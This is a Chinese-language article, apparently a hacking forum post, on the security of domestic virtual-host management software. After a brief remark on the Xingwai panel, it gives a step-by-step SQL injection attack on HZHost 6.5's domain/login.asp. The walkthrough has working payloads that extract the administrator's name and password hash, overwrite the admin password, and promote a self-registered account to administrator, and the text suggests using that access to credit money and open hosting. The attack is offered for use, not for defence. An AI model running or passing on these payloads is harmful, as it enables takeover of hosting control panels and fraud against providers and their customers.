现在大多数站长用的虚拟主机，而国内的IDC服务提供商参差不齐，安全性也是差别很多。多数IDC用的都是虚拟主机管理软件，直接安装完设置一下，一个IDC网站，包括整体服务就弄好，所以一切安全性都是软件自动设置。这种软件的好处是显而易见的，方便，不用人工去干预。但是一旦软件本身存在漏洞，服务器上的所有站点全都遭殃，而很多IDC服务商由于服务器众多，为了图方便，即使出现一些漏洞，也不会每台机器去打补丁。

　　本人曾经检测过的站点所在服务器，主要使用的虚拟主机管理软件主要有这么几个：

　　星外主机管理系统

　　目前国内70%的空间上都用的这个，曾经以bt的设置权限出名但是近期星外的菊花被爆的也是70%到目前为止官方已经修补了漏洞遇到的星外基本没有可写目录了郁闷的一点是net的马只要执行cmd iispy 直接报错注册表也做了相对的权限设置。以前的具体利用方法这里就不说了。星外又开始bt了。

　　华众虚拟主机管理系统

　　国内50%的空间商都用的这个，而hzhost最新版本是6.5，此版本的管理页面存在严重的SQL注入漏洞，可以任意修改虚拟主机后台密码。程序domain/login.asp对用户提交的参数未做有效过滤，导致SQL注射漏洞。

　　选择域名管理，在域名输入框输入测试的语句。如何判断漏洞是否存在呢?我们输入：sectop’ 密码随意输入。爆出数据库为MSSQL的数据库

　　先爆管理员密码:sectop’ and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and ’1’=’1

　　密码是MD5加密的，大家去各大解密网站解密。如果密码设置复杂，短时间无法破解。我们可以改管理的密码，使用完毕后请改回去。语句：sectop’ UPDATE [memlst] SET u_pss=’xxxxxxx’ WHERE u_nme=’admin’--此语句是把管理员密码改为xxxxxxx我们还可以将自己注册的普通帐户提升成管理员权限，注册请在前台注册。

　　语句：

　　sectop’ UPDATE [memlst] SET u_sys=6 WHERE u_nme=’你注册的用户名’--

　　sectop’ UPDATE [memlst] SET u_pwr=2 WHERE u_nme=’你注册的用户名’--

　　提交以上二句代码即可提升你的权限为管理员。提交后可在前台登陆后转到管理界面，或者直接登陆后台地址。

　　在后台就可以给自己加钱和开通域名和空间，此漏洞危害很大。